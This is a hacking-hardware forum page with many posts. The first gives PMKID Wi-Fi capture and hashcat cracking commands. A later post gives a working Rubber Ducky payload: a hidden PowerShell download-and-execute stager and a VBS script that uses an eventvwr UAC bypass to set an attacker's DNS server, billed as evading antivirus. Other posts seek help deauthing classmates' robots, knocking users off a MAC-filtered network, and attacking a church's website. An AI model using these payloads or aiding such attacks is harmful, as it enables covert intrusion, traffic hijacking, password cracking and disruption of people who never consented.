Search the Community

PMKID Attack WPA/WPA2 on WiFi Pineapples! Pineapple NANO + TETRA WARNING! This attack is EXTREMELY effective on the Pineapples! And is capable of capturing an entire neighborhood of PMKID's in a minute or less, even without access-points! ONLY use hcxdumptool on networks and devices you have expressive permission to, because of this: hcxdumptool is able to prevent complete wlan traffic! hcxdumptool is able to capture PMKID's from access points (only one single PMKID from an access point is required!) hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required!) hcxdumptool is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required!) hcxdumptool is able to capture extended EAPOL (RADIUS, GSM-SIM, WPS) hcxdumptool is able to capture passwords from the wlan traffic hcxdumptool is able to capture plain master-keys from the wlan traffic hcxdumptool is able to capture usernames and identities from the wlan traffic This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame. At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)! The main advantages of this attack are as follow: No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack) No more waiting for a complete 4-way handshake between the regular user and the AP No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results) No more eventual invalid passwords sent by the regular user No more lost EAPOL frames when the regular user or the AP is too far away from the attacker No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds) No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID. This attack is quite new, and gets updated regularly. I've compiled it for the Pineapples and uploaded it to GitHub. As the tools gets updated often, i will have to update the packages often. So please check back for updates! Download: hcxtools (v6.1.2-1) Download: hcxdumptool (v6.1.2-1) Download and install both tools automatically by using this command on your Pineapple: wget -qO- https://raw.githubusercontent.com/adde88/hcxtools-hcxdumptool-openwrt/openwrt-19.07/INSTALL.sh | bash -s -- -v -v Last update: 18.09.2020 Changelog: Updated both tools to follow changes from upstream (@ZerBea) Install procedure: Download the IPK's to your Pineapple and install them using opkg. (If you're using the Nano remember to install them to your SD-card) How do i use this? Chose an interface, and make sure it's NOT being used on anything else! Let's use wlan1 in this example. (This will set the interface to monitor mode while working) hcxdumptool -o test.pcapng -i wlan1 --enable_status 3 This will use wlan1 to perform the attack and create a file named test.pcapng containing the PMKID. (You can try other options for --enable_status (1, 2, 4, 16 ?. Use --help for more info) Filters can also be applied with --filterlist and --filtermode (Again, read --help for details) You can then use hcxpcaptool to convert the PMKID to a hash readable by hashcat. hcxpcaptool -z test.16800 test.pcapng The next step would be to transfer test.16800 to a desktop, capable of running the latest version of hashcat. (Version 4.2.0 or higher) And then run the attack, for example like this: (This cracking process shoult NOT be done on the Pineapple!!!) hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' Github repo. + source-codes: https://github.com/adde88/hcxtools-hcxdumptool-openwrt https://github.com/adde88/openwrt-useful-tools The first repo. contains the IPK files, and the SDK Makefiles needed to compile the project yourelf. The second repo contains alot of other useful tools i've compiled over time for the Pineapple, if you're interested in taking a peek. Donations are very helpful, and very much appreciated! And would help me contribute towards keeping all of these custom tools ported, alive, and up-to-date! ❤

Hello all, I need to test attacks on Tera, So first I need to set up and test all modules and attacks. would anyone help me? Thank you all.

Hi, I am trying to do a replay attack on a remote control that I have. I can capture the signals fine but when I go to decode it the wave form looks very strange and very difficult to decode. The remote sends the same string 10 times. Maybe I'm missing something? I don't know. I would love some help from anyone and your answer would be greatly valued 🙂 Please see the following pictures Zoomed in The whole string zoomed out

Hello people, I was recently doing some work with those VEX Robotics wireless control robots and I had some ideas about packet sniffing attacks, replay attacks, man in the middle attacks, and de-authentication attacks. The robots use the Vex cortex, which has a wireless adapter through a USB port, it says that is is 2.4 GHz, and another USB wireless adapter is plunged into a controller, like a joystick. My school did a competition with these robots, and it ended last week, now we are doing another thing just as a school, they said we were doing battle bots. When I did some research I hadn't seen anybody do anything like this and I though I would look into it. When I was doing research I found that, the robots don't use any encryption it is end to end, the controllers or create there own network an access point that the robot connects to, the network it creates is hidden it does not broadcast its SSID and has to be pared with the cortex, they are 2.4 GHz, they all have independent channels or mac addresses (many can operate at the same time without interference). The first thing I though of would be a deauth attack, where I would send out deauth frames to disconnect their robot from the controller from the cortex leaving their robot powerless, I was tinging I could do this with Aircrack-ng, put my wireless card into monitor mode with airmon-ng, find the mac address and channel of the robot with airodump-ng, deauth with aireplay-ng. The next attack I though of was if I could intercept packets from the remote to the cortex and either replay them to keep doing an operation or send in my own by finding out what commands correlated to what packets and injecting them while impersonating the robot. I have not done much with packet sniffing/replay/injection if anybody knows anything on how I could do that? or if anybody has done anything with these robots? or if you have any ideas on wireless attacks? I am all ears and I would love help and suggestions, this seems like a really cool project. I would love to hear your thoughts, thank you

I plan to connect a battery to my bash bunny when I receive it. Hoping that this will keep the bash bunny running before plugging the device into a target to speed up attacks. Any reason why this wouldn't work?

This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie

Hallo, I have one question about the Lan Turtle. When i connect the Lan turtle in a PC from a "big" network so the lan turtle has acces to the network, doesnt it? When i want to start a MITM attack, have the target device only be in the same network or should i connect the lan turtle directly to the targetet device? So for example i plug in the lan turtle in "PC206" and i want to attack the "PC259" does it works or should i plug in the turtle in PC259? I Hope you understand my question :) Thanks in advice, Simon PS: sorry for my bad englisch, im not a native speaker

Hello everyone, I am Cr0wTom and I recently posted in my channel a video about how to implement rubber ducky scripts in a vulnerable to BadUSB, USB thumb drive. I think that you will appreciate it here. I will be happy to hear your responce, here or in my videos commends. Feel free to subscribe :) Video Link: Thank you for watching!! (More videos to come)

There is a networking am wanting to attack just to interrupt connection. They have a MAC Filter enable and my regular ddos attack does not go through. Is there any other method of attack that will interrupt connection to their users? Need of Help ASAP

Hey guys! I present you, Automator!, A module that automates attacks such as Deauthing and Karma, and more on the way! It asks you for a few options on each attacks then commences the attack. Features : -Automated attacks -Install packages that are needed -Add and Edit profiles for attacks -Blackout Attacks - Disable all LEDs, enable stealth mode and select an attack! Coming soon : -Edit back-end scripts to suit your needs -Add community attacks/automations to the module -Auto-detect wifi cards -Reaver Automation Sneak peak :

Hello, I recently acquired the Mark IV and it's a nice little box, but as one might expect not super power. Running items like sslstrip, mitm etc at the same time forces a watchdog reboot. However I don't actually need that on the Pineapple. My idea for the travel kit: - Could be used for full MiTM attacks - Could be used for WPA2-Enterprise credential capture Solution idea: connect a 3G modem (Huawei E220) in my case Configure a script to choose between WAN or 3G for connectivity (via cron, check 3g and wan. Choose wan over 3g, establish default route) Start openvpn to home network for: Radius connectivity Force all traffic over home network for MiTM & tcpdump With the exception of getting the E220 to work reliable I think I can manage most / all on a regular linux box. But if one has tips for Pineapple WiFi. As some of the questions are: - How to configure secondary SSID's (via uci or otherwise) - Any pointers / tips in general on the E220 (saw one topic, but it doesn't work - hard to find logs/debug info - for instance where is ppp log?) Thx, stijn

Hello there, i am interested in ettercap. I want to know, if there is possible way to have ettercap on one laptop and be on it both, as a victim an attacker. for example, i start ettercap with filter setting instead of acceptencoding to acceptrubbish and as parameter i set my ip address, so i can edit my packets? i can't make it work fro some unknown reasons. thanks for reply

Hey guys! Just a curious question, would you consider hacking or DDOS'ing the Westboro Baptist Church's website, black hat hacking or white hat hacking? If you are not familiar, the Westboro Baptist Church is an EXTREMELY hateful little group in Topeka, Kansas. The group primarily attacks gays, and pretty much justifies everything they do through blaming gay people and America. They have protested hundreds of funerals of fallen soldiers and recently posted that they planed to attend the funerals of those who's lives were taken at the Sandy Hook tragedy (not sure if they actually went or not). I do know that "Anonymous", very recently, attacked their websites and twitter, posting the names, home adresses and phone numbers of those A**holes. What are your opinons on this? If you think its White hat hacking, what would your attack method be?